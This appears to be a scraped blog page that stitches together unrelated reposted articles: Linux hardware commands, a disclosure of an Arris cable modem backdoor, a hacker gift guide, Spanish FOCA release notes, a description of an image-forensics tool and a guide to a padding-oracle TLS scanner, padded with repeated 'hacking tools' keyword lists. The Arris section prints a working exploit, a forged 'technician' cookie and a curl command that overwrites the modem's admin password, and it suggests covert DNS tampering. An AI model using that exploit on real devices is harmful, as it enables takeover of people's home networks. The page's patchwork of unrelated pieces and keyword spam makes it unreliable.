martes, 14 de abril de 2020

Top Linux Commands Related To Hardware With Descriptive Definitions


Commands in Linux are just the keys to explore and close the Linux. As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well. In this blog you will exactly get the content about Linux hardware commands which are related to CPU and memory processes.

dmesg

The dmesg command is used in Linux distribution for the sake of detecting hardware and boot messages in the Linux system.

cat /proc/cpuinfo

The cat command is basically used to read something over the terminal like cat index.py will display all the content which exist in index.py over the terminal. So cat /proc/cpuinfo will display the model of the CPU over the terminal.

cat /proc/meminfo

This command is similar to the above command but the only difference is that this command shows the information of hardware memory over the terminal. Because it will open the memory info file over the terminal.

cat /proc/interrupts

This command is also similar to the above command but there is the difference of one thing that this command will display lists the number of interrupts per CPU per input output device.

lshw

This command is used in Linux operating system to displays information on hardware configuration of the system in Linux.

lsblk

The "lsblk" command is used in Linux operating system to displays block device related information in the Linux operating system.

dmidecode

The "dmidecode" command is used in Linux distributions to display the information about hardware from the BIOS.

hdparm -i /dev/sda

The hdparm command basically used to display the information about the disks available in the system. If you wanna know the information about the "sda" disk so just type "hdparm -i /dev/sda" and if you wanna know the information about "sdb" so just type "hdparm -i /dev/sdb".

hdparm -tT

The "hdparm" command is used for displaying the information about disks as we discussed in above command. If you wanna do a read speed test on the disk sda or sdb just type the command "hdparm -tT /dev/sda".

badblocks -s /dev/sda

This command is used in linux to display test operations for unreadable blocks on disk sda. If the command is like "badblocks -s /dev/sdb" it will display test operations for unreadable blocks on disk sdb.

Read more


Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


More articles


  1. Hacking Tools For Windows
  2. Hacking Tools 2019
  3. Hacker Tools For Pc
  4. Pentest Box Tools Download
  5. New Hacker Tools
  6. Hacker Tools For Windows
  7. Hacker Tools Github
  8. Hacking Tools For Windows Free Download
  9. Ethical Hacker Tools
  10. Tools Used For Hacking
  11. Pentest Tools Port Scanner
  12. Tools For Hacker
  13. How To Install Pentest Tools In Ubuntu
  14. Pentest Tools Website Vulnerability
  15. Hacking Tools Pc
  16. Pentest Tools Url Fuzzer
  17. Free Pentest Tools For Windows
  18. Hacking Tools For Pc
  19. Best Hacking Tools 2019
  20. How To Install Pentest Tools In Ubuntu
  21. Top Pentest Tools
  22. Pentest Tools Alternative
  23. Hacker Search Tools
  24. Pentest Tools Kali Linux
  25. Hacking Tools Github
  26. Hacking Tools For Mac
  27. Install Pentest Tools Ubuntu

Top 10 Great Gifts For The Hacker In Your Life

Give gifts this holiday season that inspires your favorite hackers to make something great. Our ten top picks for gifts to make 'em smile are perfect for hackers of all styles, ages, and interests.
Holiday gift guides always struggle when faced with nailing down a list for hackers — that's because hackers are as diverse in their interests and fascinations as they are diverse in gender, color, size and everything else. Someone with a multi-focused set of curiosity and unique gifts for finding out what makes the crackable crack may seem like a daunting individual to stuff a stocking for … but don't fret. With a keen eye on the latest interests in hacker culture, we've got a gift guide that can make the hacker in your life smile as they enjoy using your gift to hack and explore throughout the coming year.
The Onion Pi-Iemhacker
Anonymity online: The Onion Pi
One of the most popular "snake oil" (fake) privacy gadgets is the so-called "Tor in a box" — a plug-and-play gadget that promises to make you anonymous online. Nearly all of these are made by clueless charlatans whose products put you at risk for privacy and security breaches. But your favorite hacker can just make or build an "Onion Pi" for $69.95, and with this free tutorial.

Attribution Dice
With Attribution Dice ($20), anyone can be a high-priced security consultant, and predict breach headlines before PR firms have a chance to feed them to reporters! With every security breach, hackers roll their eyes when headlines and PR firms roll out the same old, same old terms, methods and culprits. Instead of rolling eyes, your hacker can roll the dice, and wow friends, family, and neighbors with their hacker cyber-powers.
21 Bitcoin Computer
Money is always a welcome gift. Give the gift of going hands-on with Bitcoin with the 21 Bitcoin Computer. "The 21 Bitcoin Computer is ideal for buying and selling digital goods and services. You can use it to create bitcoin-payable APIs, set up your own personal digital goods store, pay people to share your content online, or host online games of skill." It's not cheap ($395) and comes with controversy, but it's a cool toy with a lot of potential, and 21 Inc. is going to be releasing an open source package for the device soon.
Gentleman's Bogota Lockpicks and Clear Practice Lock
Iemhacker-hacking-tutorial
Conventional wisdom suggests that all hackers know how to pick locks, but can they do it in style? A perfect stocking stuffer for slick hackers of all genders is the Gentleman's Bogota lockpick set ($34.95). These featherweights pin discreetly to a collar, hat, sleeve, vest, hemline, or wherever they choose. If the hacker you're shopping for wants to learn to lockpick, or just brush up on technique, throw in the clever Clear Practice Lock ($34.95).
Inverse Path USB Armory
Iemhacker-hacking-news-tutorial-hackernews
In this reviewer's opinion, every hacker should have a USB Armory in their stocking this year. The Inverse Path USB Armory ($130) is a little USB stick with an entire computer onboard (800MHz ARM processor, 512MB RAM), designed to be a portable platform for personal security applications — and lives up to its reputation as "the Swiss Army Knife of security devices."
Hack-A-Day Gift Card
The cornerstone of hacker culture Hack-A-Day has a store offering gift cards and merchandise a-plenty. In it, you'll find a Bukito portable 3D printer ($899.97), ever-popular Facedancer21 and Gootfet42, a low energy Bluetooth Arduino microcontroller called the Lightblue Bean, and the pocket-sized open source robot arm, Mearm.
Hackers 20th Anniversary Blu-Ray Edition
Hack the planet! The 20th anniversary of influential 1995 cyberpunk film "Hackers" was this year, and this cult classic got a special edition Blu-ray release, making it the must-have for the hackers in your life. The 20th anniversary "Hackers" Blu-ray features an hour-long "making of" documentary, rich video and audio transfer for the film itself, and interviews with: Cast members Matthew Lillard, Fisher Stevens, and Penn Jillette; hacking consultants Nicholas Jarecki and Emmanuel Goldstein; Director Iain Softley, and many more involved with the film's production and style.
A Hacker's hope for better sleep: The Re-Timer
Iemhacker-Top-10-Great-gifts-For-hackers
Hackers are increasingly hacking themselves to make their own systems run better, and one thing hackers struggle with is their sleep cycles and feeling rested. Something that can help out is the Re-Timer ($299), a retro-future looking set of glasses and kit that adjusts the circadian rhythm and suppresses the body's production of melatonin (the sleepy hormone our bodies produce which makes us feel tired). Based on 25 years of research and on the market worldwide for three years, the Re-Timer has its own jet lag calculator app, as well as its Sleep App for Fitbit that makes a customized schedule based on actual sleep tracked.
USB Rubber Ducky Deluxe and LAN Turtle
Iemhacker-USB-Rubber-ducky-delux-LAN-turtle
A longtime favorite with hackers, penetration testers and IT professionals, the USB Rubber Ducky Deluxe ($42.99)is a cross-platform (Windows, Mac, Linux, Android) testing and experimentation device that is detected as a keyboard — imagine the possibilities. This stocking stuffer pairs well with its animal friend LAN Turtle ($50), a covert sysadmin and pentest tool for remote access, network intel gathering, and man-in-the-middle monitoring through a simple graphic shell (all in a generic USB ethernet adapter case).
TechShop Gift Certificate
Iemhacker-Top-10-gifts-for-the-hacker
Give the gift of hacking and making: A gift certificate to a TechShop. "Part fabrication and prototyping studio, part hackerspace, and part learning center, TechShop provides access to over $1 million worth of professional equipment and software. We offer comprehensive instruction and expert staff to ensure you have a safe, meaningful and rewarding experience." There are TechShops in Arizona, California, Michigan, Missouri, Pennsylvania, Texas, and Virginia/Washington, D.C. (some states have multiple locations). Future locations include St. Louis, MO and Paris, France.
Products to avoid
If you see these products, run! You're better off with a lump of coal. Don't waste precious holiday money on "snake oil" privacy and security products like these:
  • Anonabox
  • Wemagin
  • Webcloak
  • iGuardian (now SHIELD)
  • LogMeOnce
  • Sever: The Anti-Villain Box
Related articles

FOCA V3.4.7 Released! #FearTheFOCA What's New? @Fear_The_Foca

La nueva versión de FOCA ya está en la calle lista para que empieces a jugar con ella. Como ya habíamos anunciado mi compañero Fran Ramírez y yo en nuestro CodeTalk de novedades de FOCA, se acaba de publicar la nueva versión, la FOCA v3.4.7 con las características ya anunciadas., y alguna más.

Figura 1: FOCA v3.4.7 Released! What's new?

Por si aún no has visto el CodeTalk For Developer que hicimos Fran Ramírez y yo sobre las novedades de FOCA, lo tienes aquí mismo para que te lo veas estos días si tienes un ratito.


Figura 2: CodeTalk For Developers: Novedades de FOCA


En él estuvimos hablando, además de todas las novedades en que estábamos trabajando, de esta nueva versión 3.4.7. que ya puedes descargar de la sección de Releases de nuestro GitHub de FOCA. Aquí mismo te la dejamos listo para que la descargues.

Figura 3: Release FOCA v3.4.7 en GitHub, compilada y con  código fuente

En el artículo de hoy vamos a aprovechar y hacer un repaso de todas estas nuevas funciones que hemos añadido en esta nueva versión donde, como característica principal, se ha incluido DIARIO para el análisis de malware de los documentos, apoyándose en tecnología Machine Learning. Como habréis visto, nuestros compañeros llevan tiempo usando Machine Learning aplicado a ciberseguridad y hemos metido una de las funciones desarrolladas en nuestra querida FOCA.

Figura 4: Machine Learning Aplicado a Ciberseguridad
de  0xWord con Carmen Torrano, Paloma Recuero, Fran Ramírez,
José Torres y Santiago Hernández

Podéis ver más detalles de su funcionamhttps://github.com/ElevenPaths/FOCAiento desde la propia web de DIARIO. Para acometer estos cambios y realizar una integración a medida, hemos considerado pertinentes una serie de modificaciones que facilitan su uso, que extienden la funcionalidad de FOCA, que sigue siendo básicamente como se explica en el libro que escribimos junto con Chema Alonso de Pentesting con FOCA 2ª Edición.

Figura 5:Libro de  Pentesting con FOCA 2ª Edición en 0xWord
de Chema Alonso con colaboración de Ioseba Palop, Manu Fernández,
Pablo González, Enrique Rando, Rubén Alonso y Juanma Moreno

La primera de ellas es la actualización del árbol lateral, creando la entrada 'Document Analysis'. Eso se debe a que no solo se pueden analizar metadatos de documentos como siempre, sino que también se podrá además comprobar diferentes sistemas de detección de malware en ellos. De esta manera, se le da un concepto más amplio para cualquier futura implementación que se quiera realizar.

Figura 6: Document Analysis

También se puede apreciar que al igual que existía un 'Metadata Summary', se ha incluido un resumen de los ficheros analizados por DIARIO, catalogando aquellos documentos en los que se ha encontrado malware, y en los que no.

Figura 7: Malware Summary

Y ahora, la vista de detalle de un documento no solo incluye la información de metadatos encontrados, sino que incluye también la predicción de malware. Ambos tipos de información siempre y cuando se hayan analizado, ya que este análisis se realiza de manera independiente. Como se puede apreciar en la imagen, aparecerá una advertencia en el caso de que el análisis de metadatos y/o de malware esté pendiente.

Figura 8: Información detallada de un documento

¿Cómo se realiza el análisis de malware de uno o varios documentos? De la misma manera en la que se analizan los metadatos. Basta con ir al listado de ficheros añadidos, y utilizando el menú contextual, pulsar la opción de 'Analyze Malware' para analizar el fichero o ficheros seleccionados, o 'Analyze All Malware' para analizar todos los del listado.

Figura 9: Analizando malware con DIARIO en todos los documentos

Cabe destacar que no todos los ficheros pueden ser analizados. Para esto deben estar descargados previamente, no haber sido analizados y que tengan una extensión compatible con DIARIO. Estas extensiones son 'pdf', 'docx', 'xlsx', 'doc', y 'xls'. En este vídeo tenéis información más detallada de DIARIO.


Figura 10: DIARIO. Una nueva forma de analizar malware.

Pero estas no son las únicas novedades. Además de los ya habituales fixes de versiones anteriores y la mejora y limpieza de código, esta nueva versión incluye mejoras en la extracción de metadatos, como el análisis de imágenes embebidas en ficheros PDF.

Figura 11: Extracción de metadatos en imágenes embebidas en ficheros PDF

¡Aprovechad estos días de estar en casa y probad la nueva funcionalidad! Si son tus primeros pasos con FOCA, aquí puedes consultar una pequeña guía. Y recuerda que puedes seguir al día las novedades en nuestra Cuenta de Twitter Oficial de FOCA: @Fear_The_Foca

Fear the FOCA!

Autor: Ioseba Palop, Main FOCA Contributor.


Figura 12: Contactar con Ioseba Palop

Related word
  1. Hacker Tools Hardware
  2. Ethical Hacker Tools
  3. Hak5 Tools
  4. Computer Hacker
  5. Hacker Tools For Ios
  6. Pentest Tools Url Fuzzer
  7. Hak5 Tools
  8. Beginner Hacker Tools
  9. Pentest Tools For Mac
  10. Hackers Toolbox
  11. Pentest Tools Android
  12. Black Hat Hacker Tools
  13. Pentest Tools List
  14. Pentest Recon Tools
  15. Hack Tools Mac
  16. Pentest Tools For Ubuntu
  17. Physical Pentest Tools
  18. Nsa Hacker Tools
  19. Pentest Tools Nmap
  20. Hacking Tools Windows
  21. Blackhat Hacker Tools
  22. Hacking Tools For Mac
  23. Hack Website Online Tool
  24. Game Hacking
  25. Beginner Hacker Tools
  26. Android Hack Tools Github
  27. Pentest Tools Alternative

Sherloq - An Open-Source Digital Image Forensic Toolset



An open source image forensic toolset

Introduction
"Forensic Image Analysis is the application of image science and domain expertise to interpret the content of an image and/or the image itself in legal matters. Major subdisciplines of Forensic Image Analysis with law enforcement applications include: Photogrammetry, Photographic Comparison, Content Analysis, and Image Authentication." (Scientific Working Group on Imaging Technologies)
Sherloq is a personal research project about implementing a fully integrated environment for digital image forensics. It is not meant as an automatic tool that decide if an image is forged or not (that tool probably will never exist...), but as a companion in putting at work various algorithms to discover potential image inconsistencies.
While many commercial solutions have unaffordable prices and are reserved to law enforcement and government agencies only, this toolset aims to be both a powerful and extensible framework providing a starting point for anyone interested in testing or developing state-of-the-art forensic algorithms.
I strongly believe that security-by-obscurity is the wrong way to offer any kind of security service (i.e. "Using this proprietary software I guarantee you that this photo is pristine... and you have to trust me!"). Instead, following the open-source mentality, everyone should be able to personally experiment various techniques, gain more knowledge and share it to the community... even better if they propose code improvements! :)

Features
A Qt-based GUI provides highly responsive widgets for panning, zooming and inspecting images, while all image processing routines are handled by OpenCV for best efficiency. The software is based on a multi-document interface that can use floating or tabbed view for subwindows and tool outputs can be exported in various textual and graphical formats.
These are the currently planned functions [(***) = fully implemented, (**) = partially implemented, (*) = not yet implemented]:

General
  • Original Image: display the unaltered reference image for visual inspection (***)
  • Image Digest: compute byte and perceptual hashes together with extension ballistics (**)
  • Similarity Search: use reverse search services for finding similar images on the web (*)
  • Automatic Tagging: exploit deep learning algorithms for automatic picture tagging (*)

File
  • Metadata Dump: gather all metadata information and display security warnings (**)
  • EXIF Structure: dump the physical EXIF structure and display an interactive view (***)
  • Thumbnail Analysis: if present, extract embedded thumbnail and highlight discrepancies (***)
  • Geolocation Data: if present, get geographic data and locate them on a world map view (***)

Inspection
  • Enhancing Magnifier: apply local visual enhancements for better identifying forgeries (***)
  • Image Adjustments: apply standard adjustments (contrast, brightness, hue, saturation, ...) (***)
  • Tonal Range Sweep: interactive tonality range compression for easier artifact detection (***)
  • Reference Comparison: synchronized double view to compare reference and evidence images (***)

JPEG
  • Quality Estimation: extract quantization tables and estimate last saved JPEG quality (***)
  • Compression Ghosts: use error residuals to detect multiple compressions at different levels (**)
  • Double Compression: exploit First Digit Statistics to discover potential double compression (**)
  • Error Level Analysis: identify areas with different compression levels against a fixed quality (***)

Colors
  • RGB/HSV 3D Plots: display interactive 2D and 3D plots of RGB and HSV pixel data (*)
  • Color Space Conversion: convert image into RGB/HSV/YCbCr/Lab/CMYK color spaces (***)
  • Principal Component Analysis: use PCA to project RGB values onto a different vector space (***)
  • RGB Pixel Statistics: compute minimum/maximum/average RGB values for every pixel (***)

Luminance
  • Luminance Gradient: analyze brightness variations along X/Y axes of the image (***)
  • Frequency Separation: extract the finest details of the luminance channel (*)
  • Echo Edge Filter: use 2D Laplacian filter to reveal artificial blurred zones (***)
  • Wavelet Reconstruction: re-synthesize image varying wavelet coefficient thresholds (*)

Noise
  • Noise Extraction: estimate and separate the natural noise component of the image (***)
  • Min/Max Deviation: highlight pixels deviating from block-based min/max statistics (***)
  • SNR Consistency: evaluate uniformity of signal-to-noise ratio across the image (***)
  • Noise Segmentation: cluster uniform noise areas for easier tampering detection (*)

Tampering
  • Contrast Enhancement: analyze histogram inconsistencies caused by enhancements (***)
  • Clone Detection: use invariant feature descriptors for copy/rotate clone area detection (**)
  • Resampling Detection: analyze 2D pixel interpolation for detecting resampling traces (**)
  • Splicing Detection: use DCT coefficient statistics for automatic splicing zone detection (*)

Setup
The software is written in C++11 using Qt Framework for platform-independent GUI and OpenCV Library for efficient image processing. Other external depencies are ExifTool for metadata extraction, LIBSVM for forgery detection and AlgLib for histogram manipulation.
Even if the project objective is clear, actually the software is an early prototype, so some functionalities are still missing (see list above) and it can be run only from Qt Creator under Linux. I put it on Github to track my development progress even during the alpha stage, so expect issues, bugs and installation headaches, however, if you want to take a look around, feel free to contact me if you are experiencing problems in making it run.

Screenshots

File Analysis: Metadata, Digest and EXIF

 Color Analysis: Space Conversion, PCA Projection, Histograms and Statistics

Visual Inspection: Magnifier Loupe, Image Adjustments and Evidence Comparison

JPEG Analysis: Quantization Tables, Compression Ghosts and Error Level Analysis

Luminance and Noise: Light Gradient, Echo Edge, Min/Max Deviation and SNR Consistency




via KitPloitContinue reading

Scanning For Padding Oracles

As you might have heard, we recently got our paper on padding oracle attacks accepted to the USENIX Security Conference. In this paper, we describe and evaluate a scanning methodology with which we found several padding oracle vulnerabilities in devices from various vendors. In total, we found that 1.83% of the Alexa Top 1 Million have padding oracle vulnerabilities.

To test whether a server is vulnerable, we specified different padding oracle vectors which we send to the system under test, using different cipher suites and protocol versions. If the server does not behave identically (on both the TLS and TCP layers), we consider it to be vulnerable to a padding oracle attack, since it is leaking information about the plaintext via behavior differences. Depending on the responses to such padding oracle vectors, one can estimate which implementation is responsible for the vulnerability. We contacted quite a few website owners and tried to cooperate with them, to find out which vendors and TLS stacks are responsible for the identified vulnerabilities. You can find our current disclosure status on this issue on https://github.com/RUB-NDS/TLS-Padding-Oracles.
We are currently in contact with other vendors to fix the remaining vulnerabilities, but the some of the rare (in terms of the number of affected hosts) vulnerabilities are currently not attributed. To fix the remaining vulnerabilities, we ask for your assistance to help get rid of this issue. For this purpose, we integrated a standalone version of our padding oracle evaluation tool into our TLS-Scanner (v.2.7) project. This tool allows you (among other things) to evaluate if a specific server is vulnerable.

When the tool detects a vulnerability, it tries to attribute the vulnerability to a specific vendor or CVE. If we already know of the vulnerability of the server you scanned, the tool will print its details. If the tool does not have a description of the vulnerability in its database, it will ask you to notify us about the vulnerable server, such that we can notify the vendor and get the device fixed. To be clear: the tool never sends any data to us - you have the choice of whether to notify us (and what details to include). There is a chance that the tool's attribution is also mistaken, that is, the tool lists a vendor for your host, but you know for sure that you do not use an implementation by this vendor. Please contact us in such cases as well.

How to use the Tool

First, you need to grab hold of the tool. There are 3 ways to get your hands dirty: pre-compiled, self-compiled or Docker. We provide a pre-compiled version of the tool since the compilation process can get quite messy if you are not familiar with java and maven. You can directly download the resulting project here. However, if you also want to play around with the code, you have to compile everything yourself.

Building the TLS-Scanner

For this, you will need (Git), maven (sudo apt-get install maven), OpenJDK-8  (I can guarantee that this version works, other versions might work as well, have not tested it).

You will need to get TLS-Attacker 2.9 (if you do not already have it):
Now we can clone and install the TLS-Scanner

Docker

We also provide a Dockerfile, which lets you run the scanner directly

Getting Started


If you start the TLS-Scanner you should be greeted by a usage info, similar to the one below:

 or


This should give you an overview of the supported command line flags. The only really required one is the -connect flag (similar to OpenSSL and TLS-Attacker), with which you specify which host to scan. The most basic command is therefore:

Your output may look something like this:

By default, TLS-Scanner will run single-threaded. In such cases the scanning will take a while; just how long it will take depends on your server configuration. The scanner also supports multi-threading, which drastically improves the performance. There are two parameters to play around with, -threads, which controls how many different "probes" are executed in parallel, and -aggressive , which controls how many handshakes can be executed simultaneously. If you want the fastest results the following parameters are usually a good choice:

But lets get back to the results of the Scanner. Currently the Scanner supports a bunch of well known tests, like supported ciphersuites or protocol versions. These are very similar to what you may be used to from other scanners like ssllabs or testssl.sh.

Padding Oracles

The main advantage of our scanner is the ability to scan for padding oracle vulnerabilities (which is probably why you are reading this post). You will see if you are vulnerable in the "Attack Vulnerabilities" section. For example, when scanning hackmanit.de, the result is false. Good for us! But as you might have seen there is also another section in the scanner report:"PaddingOracle Responsemap"
This section lists the responses of the scanned host for each padding oracle vector, for each cipher suite and protocol version. For hackmanit.de, there is no detected difference in responses, which means hackmanit.de is not vulnerable to the attack:
If we want, we can also look at the concrete responses of the server. For this purpose, we start the scanner with the -reportDetail flag:

With this flag we now get the following details:

So what does this all mean? First of all, we named our malformed records. The interpretation of those names is visualized in the following table:
BasicMac-<position>-<XOR>  A Record with ApplicationData, MAC and padding bytes, where the padding byte at <position> is XOR'd <XOR>
 MissingMacByteFirst A Record without ApplicationData, where the first byte of the MAC is missing
 MissingMacByteLast A Record without ApplicationData, where the last byte of the MAC is missing
 Plain FF A Record without ApplicationData & MAC which only contains Paddingbytes: 64* 0xFF 
 Plain 3F A Record without ApplicationData & MAC which only contains Paddingbytes: 64* 0xF3
 InvPadValMac-[<position>]-<appDataLength>-<paddingBytes> A Record with invalid padding and valid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The Padding is invalid at <position>.
 ValPadInvMac-[<position>]-<appDataLength>-<paddingBytes> A Record with valid padding and invalid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The MAC is invalid at <position>.
 InvPadInvMac-[<position>]-<appDataLength>-<paddingBytes> A Record with invalid padding and invalid MAC. The Record contains <appDataLength> many ApplicationData bytes and <paddingBytes> many PaddingBytes. The MAC is invalid at the first position. The Padding is invalid at <position>.

Next to the name you can see what the actual response from the server was. Alert messages which are in [] brackets indicate that the alert was a fatal alert while () brackets indicate a warning alert. ENC means that the messages were encrypted (which is not always the case). The last symbol in each line indicates the state of the socket. An X represents a closed socket with a TCP FIN, a T indicates that the socket was still open at the time of measurement and an @ indicates that the socket was closed with an RST. So how did Hackmanit respond? We see a [BAD_RECORD_MAC]  ENC X, which means we received an ENCrypted FATAL BAD_RECORD_MAC alert, and the TCP connection was closed with a TCP FIN. If a server appears to be vulnerable, the scanner will execute the scan a total of three times to confirm the vulnerability. Since this response is identical to all our vectors, we know that the server was not vulnerable and the scanner is not re-executing the workflows.

Here is an example of a vulnerable host:
As you can see, this time the workflows got executed multiple times, and the scanner reports the cipher suite and version as vulnerable because of "SOCKET_STATE". This means that in some cases the socket state revealed information about the plaintext. If you look closely, you can see that for ValPadInvMac-[0]-0-59, ValPadInvMac-[8]-0-59 and ValPadInvMac-[15]-0-59 the server failed to close the TCP socket, while for all other vectors the TCP connect was closed with a TCP FIN. The server was therefore vulnerable.

Since the server was vulnerable, TLS-Scanner will also print an additional section: "PaddingOracle Details"

In this section we try to identify the vulnerability. In the example above, TLS-Scanner will print the following:

As you can see, we attribute this vulnerability to OpenSSL <1.0.2r. We do so by looking at the exact responses to our malformed records. We additionally print two important facts about the vulnerability: Whether it is observable and its strength. The precise details of these properties are beyond the scope of this blogpost, but the short version is:
If an oracle is observable, a man in the middle attacker can see the differences between the vectors by passively observing the traffic, without relying on browser or application specific tricks. A strong oracle has no limitations in the number of consecutive bytes an attacker can decrypt. If an oracle is STRONG and OBSERVABLE, then an attacker can realistically exploit it. This is the case in the example above.
For more details on this, you will have to wait for the paper.

Attribution

As you can see, we try to fingerprint the responsible device/implementation. However, we were not able to identify all vulnerable implementations yet. If we cannot attribute a vulnerability you will receive the following message:

Could not identify the vulnerability. Please contact us if you know which software/hardware is generating this behavior.

If you encounter this message, we do not know yet who is responsible for this padding oracle and would be happy to know which device/vendor is responsible. If you know who is, please contact us so that we can get in contact with the vendor to fix the issue. To reiterate, the tool never sends any data back to us, and it is your choice whether to contact us manually or not.

There are also some cases in which we can identify the vendor, but the vendor has not patched the vulnerability yet. If you encounter such a host, the scanner will tell you that we know the responsible vendor. To prevent abuse, we do not include further details.

Non-Determinism and Errors

In some cases, the scanner is unable to scan for padding oracles and reports ERROR or non-deterministic responses. The ERROR cases appear if the scanner failed could not handshake with the specified cipher suite and protocol version. This might be due to a bug in the tested TLS-Server or a bug in TLS-Attacker or TLS-Scanner. If you think the handshake fails because of an issue on our side, please open an issue on Github, and we will investigate. The more interesting cases are the non-deterministic ones. In such cases the scanner observed non-identical scan results in three separate scans. This can be due to non-determinism in the software, connection errors, server load or non-homogeneous load balancing. Currently, you will have to analyze these cases manually. In the paper, we excluded such hosts from our study because we did not want to artificially improve our results. But we understand that you as a tester want to know if the server is vulnerable or not. If the server is not truly vulnerable you would see the differences between the answers spread across all the different vectors. If the differences only appear on a subset of malformed records the server is very likely vulnerable. If you are unsure, you can also always scan multiple times (or scan slowly), increase the timeout, or if you are entirely lost get in touch with us. 


How YOU can help

Please use the scanner on all your hosts and check for padding oracle vulnerabilities. If the scanner can identify your vulnerability, a patch should already be available. Please patch your system! If the scanner does not identify the vulnerability (and instructs you to contact us), please contact us with the details (robert.merget@rub.de). If you can provide us with the detailed output of the scanner or even better, the name of the host, with the corresponding vendor, we could match the results with our database and help fix the issue. We can already attribute over 90% of the vulnerabilities, but there is still a lot to be discovered. We mostly scanned the Alexa top 1-million on port 443. Other protocols like IMAPS, POP3S, etc. might have different implementations with different vulnerabilities. If you find vulnerabilities with our tool, please give us credit. It helps us to get more funding for our project.

Issues with the Scanner


A notable feature of our scanner is that we do not actively try to avoid intolerances (like not scanning with a lot of cipher suites in the Hello messages etc.). We believe that doing so would hide important bugs. We are currently experimenting with intolerances checks, but the feature is now still in beta. If we cannot scan a server (most of the time due to intolerances or SNI problems), the scanner will report a lot of intolerances and usually no supported protocol versions. Some intolerances may trick the scanner into reporting false results. At the current stage, we cannot make any guarantees. If you are using this tool during a pentest, it might be smart to rescan with other scanners (like the recently released padcheck tool from our colleague Craig Young) to find the ground truth (this is good advice in general, since other mainstream scanners likely have the same issues). Note however that it is very unlikely that the scanner reports a false positive on a padding oracle scan.


Conclusion

There are still a lot of padding oracle vulnerabilities out there - and a lot of them are still unpatched. We hope you will find some bugs with the tool :) Happy H4cking :D


Acknowlegements

This is joint work from Robert Merget (@ic0nz1), Juraj Somorovsky (@jurajsomorovsky),  Nimrod Aviram (@NimrodAviram), Janis Fliegenschmidt (@JanisFliegens), Craig Young (@craigtweets), Jörg Schwenk (@JoergSchwenk) and (Yuval Shavitt).
More information